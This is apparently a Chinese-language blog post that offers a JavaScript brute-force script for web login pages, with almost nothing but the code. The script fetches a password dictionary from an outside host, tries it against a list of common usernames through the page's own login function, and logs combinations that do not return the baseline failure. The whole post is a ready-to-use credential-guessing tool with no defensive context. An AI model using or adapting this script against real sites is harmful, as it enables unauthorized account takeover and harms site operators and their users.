JS 登录函数爆破脚本

/**
 *    调用 WEB 登录页面自己的登录函数尝试爆破
 *    @Author:  delovt
 *    @Date:    2018-08-02T16:58:09+0800
 *    --------------------
 *    ajax 脚本来自 pkav
 *    从外部 't.sys7em.info/?act=dict&file=cus' 获取字典
 *    切割后分别赋值给对应的变量后传递给登录函数
 */
let pkav = {ajax:function(){var xmlHttp;try{xmlHttp=new XMLHttpRequest();}catch (e){try{xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");}catch (e){try{xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");}catch (e){return false;}}}return xmlHttp;},req:function(url,data,method,callback){method=(method||"").toUpperCase();method=method||"GET";data=data||"";if(url){var a=this.ajax();a.open(method,url,true);if(method=="POST"){a.setRequestHeader("Content-type","application/x-www-form-urlencoded");}a.onreadystatechange=function(){if (a.readyState==4 && a.status==200){if(callback){callback(a.responseText);}}};if((typeof data)=="object"){var arr=[];for(var i in data){arr.push(i+"="+encodeURIComponent(data[i]));}a.send(arr.join("&"));}else{a.send(data||null);}}},get:function(url,callback){this.req(url,"","GET",callback);},post:function(url,data,callback){this.req(url,data,"POST",callback);}};
pkav.get('http://t.sys7em.info/?act=dict&file=cus',function(rs){
  let pwds = rs.split('\n');
  let users = ['admins','system','guest','guests','super','supermap'];
  let a = 'POST';
  let b = "LOGIN URI";
  let c = {'username':'admin','password':'123456','submit':'submit'};
  let specimen = sendRequestWithResponse(a,b,c);
  for(i = 0; i < users.length; i++) {
    c.username = users[i];
    for(k = 0; k < pwds.length; k++) {
      c.password = pwds[k];
      let result = sendRequestWithResponse(a,b,c);
      if(specimen.referer == result.referer && specimen.reason == result.reason && specimen.succeed == result.succeed)
        continue;
      else
        console.log(c.username+':'+c.password+' => '+result.referer+','+result.reason+','+result.succeed);
    }
  } 
  console.log('burte finish');
});

标签: none

添加新评论